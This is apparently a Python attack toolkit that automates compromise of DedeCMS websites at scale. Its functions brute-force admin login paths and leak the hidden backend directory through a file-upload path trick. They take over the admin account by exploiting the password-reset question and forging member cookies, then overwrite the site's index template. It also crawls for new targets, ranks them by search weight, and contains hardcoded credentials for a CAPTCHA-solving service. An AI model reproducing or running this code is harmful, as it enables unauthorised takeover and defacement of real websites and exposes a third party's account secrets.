def edit_templates(self, ): global content try: res = self._login_admin() if not res: return { "domain": self.domain, "res": False, "info": "后台登录失败:%s" % self.user } else: print('后台登录成功') acdir_url = "%s/templets_main.php" % self.back_ground_url a = utils.my_requests(method="get", url=acdir_url, requester=self.session) try: acdir = re.findall(r"(?<=action=upload&acdir=)\S+(?='>)", a.text)[0] except Exception as e: acdir = "admin" eidt_url = self.back_ground_url + '/tpl.php?action=edit&acdir=%s&filename=index.htm' % acdir edit_content = utils.my_requests(method="get", url=eidt_url, requester=self.session) edit_content.encoding = edit_content.apparent_encoding try: content = re.findall( r'(<textarea id="content" .*?>([\s\S]*?)</textarea>)', edit_content.text)[0][1] # 处理content内容 content = content.encode(self.charset) except Exception as e: print(e) post_form = { "action": "saveedit", "acdir": acdir, "filename": 'index.htm', "content": content } self.heders[ 'Content-Type'] = 'application/x-www-form-urlencoded,charset=%s' % self.charset res = utils.my_requests(method="post", url=self.back_ground_url + "/tpl.php", headers=self.heders, data=post_form, allow_redirects=True, timeout=120, requester=self.session) if "成功修改" in res.text: return { "domain": self.domain, "res": True, "info": "success" } except Exception as e: print(e)
def _login_admin(self, try_count=3): # global hash_v, hash_k, rhash_k, rhash_v try: login_url = "%s/login.php" % self.back_ground_url login_form = { "dopost": "login", "adminstyle": "newdedecms", "validate": "", "gotopage": self.back_ground_url + "/index.php", "userid": self.user, "pwd": self.pwd } res = utils.my_requests(login_url, timeout=60, requester=self.session) try: self.charset = res.apparent_encoding except Exception as e: print("%s:编码识别错误" % self.domain) # if "vdimgck" in re.sub("(?=<!--)[\s\S]+(?<=-->)","",res.text): if 1 == 1: res = utils.my_requests(self.domain + self.vcode_url, timeout=10, requester=self.session) img_path = "./vcode/%d.jpg" % int(time.time()) with open(file=img_path, mode="wb") as fp: fp.write(res.content) img = Image.open(img_path) vcode_v = utils.base64_api(uname='danche', pwd='qq199605', img=img) if "余额不足" in vcode_v: return False login_form.update({"validate": vcode_v}) res = utils.my_requests(method="post", url=login_url, data=login_form, allow_redirects=True, timeout=120, requester=self.session) if "验证码不正确" in res.text: return False return True except Exception as e: traceback.print_exc() if try_count > 0: return self._login_admin(try_count - 1) else: return False
def get_admin_cookie(self): res = self._login_member() if not res: return { "domain": self.domain, "res": False, "info": "会员页登录失败:%s" % self.user } try: res = utils.my_requests(method="get", url="%s/member/index.php?uid=0000001" % self.domain, requester=self.session) cookie = requests.utils.dict_from_cookiejar(self.session.cookies) # if "last_vid__ckMd5" not in cookie.keys(): # return {"domain": self.domain, "res": False, "info": "空间未开放"} cookie.update({ "DedeUserID": "0000001", "DedeUserID__ckMd5": cookie["last_vid__ckMd5"] }) return {"domain": self.domain, "res": True, "info": cookie} except Exception as e: return { "domain": self.domain, "res": False, "info": "获取前台cookie失败(空间未开放)" }
def post_data(session, domain, vcode, uname="0000001", dopost="regbase"): try: params = { "dopost": dopost, "step": 1, "mtype": "个人", "mtype": "个人", "userid": uname, "uname": "0000001c", "userpwd": "qwe123", "userpwdok": "qwe123", "email": "*****@*****.**", "safequestion": 0, "safeanswer": "", "sex": "", "agree": "" } params.update({"vdcode": vcode}) res = utils.my_requests(url=domain + "/member/reg_new.php", params=params, timeout=10, requester=session) return res except Exception as e: traceback.print_exc() return False
def select_weight(domain): weight = 0 try: aizhan_api = "https://apistore.aizhan.com/baidurank/siteinfos/%s?domains=%s" % ( my_key, domain.replace("https://", "").replace("http://", "")) res = utils.my_requests(aizhan_api) data = json.loads(res.text)["data"]["success"] weight = data[0]["pc_br"] except Exception as e: traceback.print_exc() return weight
def _login_admin(self, try_count=3): # global hash_v, hash_k, rhash_k, rhash_v try: login_url = "%s/login.php" % self.back_ground_url login_form = { "dopost": "login", "adminstyle": "newdedecms", "userid": self.user, "pwd": self.pwd } utils.my_requests(login_url, timeout=60, requester=self.session) utils.my_requests(method="post", url=login_url, data=login_form, allow_redirects=True, timeout=120, requester=self.session) return True except Exception as e: traceback.print_exc() if try_count - 1 > 0: return self._login_admin(try_count - 1) else: return False
def try_common(domain): back_dir_dict = [] s = domain.replace("http://", "").replace("https://", "") n = len(s.split(".")) if n == 2: path = s.split(".")[0] back_dir_dict = [ path, "admin_%s" % path, "dede_%s" % path, "ad_%s" % path, "bk_%s" % path, "background_%s" % path, "houtai_%s" % path, "%s_admin" % path, "%s_dede" % path, "%s_ad" % path, "%s_bk" % path, "%s_background" % path, "%s_houtai" % path ] if n >= 3: for path in s.split(".")[:n - 1]: back_dir_dict = [ path, "admin_%s" % path, "dede_%s" % path, "ad_%s" % path, "bk_%s" % path, "background_%s" % path, "houtai_%s" % path, "%s_admin" % path, "%s_dede" % path, "%s_ad" % path, "%s_bk" % path, "%s_background" % path, "%s_houtai" % path ] back_dir_dict.extend(base_back_dict) for back_dir in back_dir_dict: print(domain + "/" + back_dir + "/login.php") res = utils.my_requests(domain + "/" + back_dir + "/login.php", try_count=2) if res and res.status_code == 200 and "login.php" in res.url: res = {"domain": domain, "res": True, "info": back_dir} ress.append(res) return res pass
def crawling(i): while True: try: #title_words = ['银行', '政府', '管理', '内容', '系统'] path = './dict/采集标题过滤字典.txt' title_words = utils.get_lines(path) domain_model = dbsqlite.data_getlist(' is_crawl = 0 limit 1')[0] if not domain_model: print('线程:%d未查到采集源,等待3s' % i) time.sleep(3) continue url = domain_model[1] print('线程%d:%s' % (i, url)) response = my_requests(url) if response: response.encoding = response.apparent_encoding response2_txt = response.text title = re.findall('<title>(.+)</title>', response2_txt)[0] if any(each in title for each in title_words): dbsqlite.data_update(url, "title = '%s',status = 1" % title) continue else: dbsqlite.data_update(url, "title = '%s'" % title) urllist = getUrllist(response.text, url) print('%s友链数:%d' % (url, len(urllist))) for curl in urllist: # s = urllib.parse.urlparse(url).netloc try: res = utils.my_requests(url=curl, try_count=1, timeout=10) if res: curl = utils.format_domain(res.url, protocol=True) else: continue except Exception as e: continue if dbsqlite.data_select(curl): continue dbsqlite.data_insert(curl) else: dbsqlite.data_update(url, 'status = 1') except Exception as e: print(e) continue
def bash_select_weight(): domains = list(utils.get_lines("查权重")) ress = {} domains_g = utils.group_by_list(domains, 50) for domains in domains_g: try: aizhan_api = "https://apistore.aizhan.com/baidurank/siteinfos/%s?domains=%s" res = utils.my_requests( aizhan_api % (my_key, "|".join(domains).replace( "https://", "").replace("http://", ""))) for data in json.loads(res.text)["data"]["success"]: ress.update({data["domain"]: data["pc_br"]}) except Exception as e: traceback.print_exc() ress = sorted(ress.items(), key=lambda d: d[1], reverse=True) with open(file="./res/权重", mode="a") as fp: for res in ress: fp.write("\nd%s|%s" % (res[0], res[1]))
def multi_try_common(domains): ress = [] custom_base_bg = [ "%s", "admin_%s", "dede_%s", "ad_%s", "bk_%s", "background_%s", "houtai_%s", "%s_admin", "%s_dede", "%s_ad", "%s_bk", "%s_background", "%s_houtai" ] ns = len(custom_base_bg) custom_base_bg.extend(base_back_dict) for n in range(len(custom_base_bg)): back_dir = custom_base_bg[n] for data in domains[:]: try: domain = utils.format_domain(data[1], protocol=True) if n < ns: domain_middle = tldextract.extract(domain).domain bg = back_dir % domain_middle else: bg = back_dir print(domain + "/" + bg + "/login.php") res = utils.my_requests(url=domain + "/" + bg + "/login.php", try_count=1, show_log=False) if not res or res.status_code != 200 or "login.php" not in res.url: continue res = {"domain": data[1], "res": True, "info": bg} ress.append(res) domains.remove(data) except ConnectionError as e: print(e) except requests.exceptions.ReadTimeout as e: print(e) except TimeoutError as e: print(e) except Exception as e: traceback.print_exc() return ress
def start(self): res = self.get_admin_cookie() if not res["res"]: return res params = { "dopost": "safequestion", "safequestion": "0.0", "safeanswer": "", "id": 1 } cookie_str = str(res["info"]).replace("'", "").replace( "{", "").replace("}", "").replace(": ", "=").replace(", ", "; ") headers = {"Cookie": cookie_str} try: reset_pwd_url = "%s/member/resetpassword.php" % self.domain res = requests.post(url=reset_pwd_url, params=params, headers=headers) pwd_url = re.findall("(?<=href=').*(?='>)", res.text)[0].replace('amp;', "") # pwd_url = re.sub("(http://).*(?=http)", "", pwd_url) # res = self.session.get(pwd_url) key = re.findall("(?<=key=).*", pwd_url)[0] login_form = { "dopost": "getpasswd", "userid": "admin", "setp": "2", "id": "1", "pwd": self.pwd, "pwdok": self.pwd, "key": key } res = utils.my_requests(method="post", url=reset_pwd_url, data=login_form, allow_redirects=True, timeout=120, requester=self.session) if "密码成功" not in res.text: res = utils.my_requests(method="post", url=reset_pwd_url, params=login_form, allow_redirects=True, timeout=120, requester=self.session) if "密码成功" not in res.text: return { "domain": self.domain, "res": False, "info": "更新前台admin密码失败" } except Exception as e: traceback.print_exc() return { "domain": self.domain, "res": False, "info": "更新前台admin密码失败" } try: # self.user = "******" # self.session = requests.session() res = self.get_admin_cookie() self.session = requests.session() for k, v in res["info"].items(): self.session.cookies[k] = v if not res: print("第二次获取admin cookie失败,异常") return res except: if not res: return { "domain": self.domain, "res": False, "info": "更新后台admin密码失败" } res = self.reset_back_admin() return res
def _login_member(self, try_count=3): try: login_url = "%s/member" % self.domain login_form = { "dopost": "login", "fmdo": "login", "userid": self.user, "pwd": self.pwd, "vdcode": "", "gourl": "/", "keeptime": "604800" } res = utils.my_requests(login_url, timeout=60, requester=self.session) try: self.charset = res.apparent_encoding except Exception as e: print("%s:编码识别错误" % self.domain) # if "vdimgck" in re.sub("(?=<!--)[\s\S]+(?<=-->)","",res.text): if 1 == 1: res = utils.my_requests(self.domain + self.vcode_url, timeout=10, requester=self.session) img_path = "./vcode/%d.jpg" % int(time.time()) with open(file=img_path, mode="wb") as fp: fp.write(res.content) img = Image.open(img_path) vcode_v = utils.base64_api(uname='danche', pwd='qq199605', img=img) login_form.update({"vdcode": vcode_v}) res = utils.my_requests(method="post", url=login_url + "/index_do.php", headers=self.heders, data=login_form, allow_redirects=True, timeout=120, requester=self.session) if "DedeUserID" in requests.utils.dict_from_cookiejar( self.session.cookies).keys(): return True else: res = utils.my_requests(method="post", url=login_url + "/index_do.php", headers=self.heders, params=login_form, allow_redirects=True, timeout=120, requester=self.session) if "DedeUserID" in requests.utils.dict_from_cookiejar( self.session.cookies).keys(): return True if try_count > 0: return self._login_member(try_count - 1) except Exception as e: traceback.print_exc() if try_count > 0: return self._login_member(try_count - 1) else: return False
def reset_back_admin(self, try_count=3): try: res = utils.my_requests(method="get", url=self.domain + "/member/edit_baseinfo.php", requester=self.session) try: uname = re.findall(r'(?<=id\="uname" value\=").*?(?=")', res.text)[0] except Exception as e: uname = "admin" post_form = { "dopost": "save", "uname": uname, "oldpwd": self.pwd, "userpwd": self.pwd, "userpwdok": self.pwd, "safequestion": "0", "safeanswer": "", "newsafequestion": "0", "newsafeanswer": "", "sex": "男".encode(self.charset), "email": "*****@*****.**", "vdcode": "" } res = utils.my_requests(self.domain + self.vcode_url, timeout=10, requester=self.session) img_path = "./vcode/%d.jpg" % int(time.time()) with open(file=img_path, mode="wb") as fp: fp.write(res.content) img = Image.open(img_path) vcode_v = utils.base64_api(uname='danche', pwd='qq199605', img=img) post_form.update({"vdcode": vcode_v}) res = utils.my_requests(method="post", url=self.domain + "/member/edit_baseinfo.php", headers=self.heders, data=post_form, allow_redirects=True, timeout=120, requester=self.session) if "成功" not in res.text: res = utils.my_requests(method="post", url=self.domain + "/member/edit_baseinfo.php", headers=self.heders, params=post_form, allow_redirects=True, timeout=120, requester=self.session) if "成功" not in res.text: if try_count > 0: return self.reset_back_admin(try_count - 1) else: if "完成详细资料" in res.text: return { "domain": self.domain, "res": False, "info": "失败(完善详细资料)!!!" } return { "domain": self.domain, "res": False, "info": "失败!!!" } return { "domain": "%s|%s|admin(%s)" % (self.domain, self.back_ground_url, uname), "res": True, "info": "成功!!!" } except Exception as e: traceback.print_exc() if try_count > 0: return self.reset_back_admin(try_count - 1) else: return {"domain": self.domain, "res": False, "info": "失败!!!"}
def get_back_url(domain): back_dir = "" flag = 0 up_path = "./../{p}<</images/adminico.gif" data = { "_FILES[mochazz][tmp_name]": up_path, "_FILES[mochazz][name]": 0, "_FILES[mochazz][size]": 0, "_FILES[mochazz][type]": "image/gif" } site_files = [ "/plus/diy.php", "/plus/list.php", "/plus/feedback.php", "/plus/count.php", "/tags.php" ] try: for site_file_path in site_files: url = domain + site_file_path res = utils.my_requests(url) if res and res.status_code == 200: target_url = domain + site_file_path if site_file_path == "/tags.php": up_path = "./{p}<</images/adminico.gif" data.update({"_FILES[mochazz][tmp_name]": up_path}) break else: res = {"domain": domain, "res": False, "info": "找不到上传路径"} return res for num in range(1, 3): if flag: break for pre in itertools.permutations(characters, num): pre = ''.join(list(pre)) # if pre == "my": # print("1") data["_FILES[mochazz][tmp_name]"] = data[ "_FILES[mochazz][tmp_name]"].format(p=pre) print("testing", pre) r = utils.my_requests(target_url, method="post", data=data) data["_FILES[mochazz][tmp_name]"] = up_path if "Upload filetype not allow !" not in r.text and r.status_code == 200: flag = 1 back_dir = pre break if not flag: res = {"domain": domain, "res": False, "info": "没找到"} return res print("[+] 前缀为:", back_dir) flag = 0 for i in range(len(characters)): if flag: break for ch in characters: if back_dir == "aaaa": res = {"domain": domain, "res": False, "info": "循环错误"} return res if ch == characters[-1]: flag = 1 break data["_FILES[mochazz][tmp_name]"] = data[ "_FILES[mochazz][tmp_name]"].format(p=back_dir + ch) r = utils.my_requests(target_url, method="post", data=data) data["_FILES[mochazz][tmp_name]"] = up_path if "Upload filetype not allow !" not in r.text and r.status_code == 200: back_dir += ch print("%s[+]" % domain, back_dir) # print("后台地址为:", domain+"/"+back_dir) break res = {"domain": domain, "res": True, "info": back_dir} print("后台地址为:", domain + "/" + back_dir) return res except Exception as e: traceback.print_exc() res = {"domain": domain, "res": False, "info": "未知错误"} return res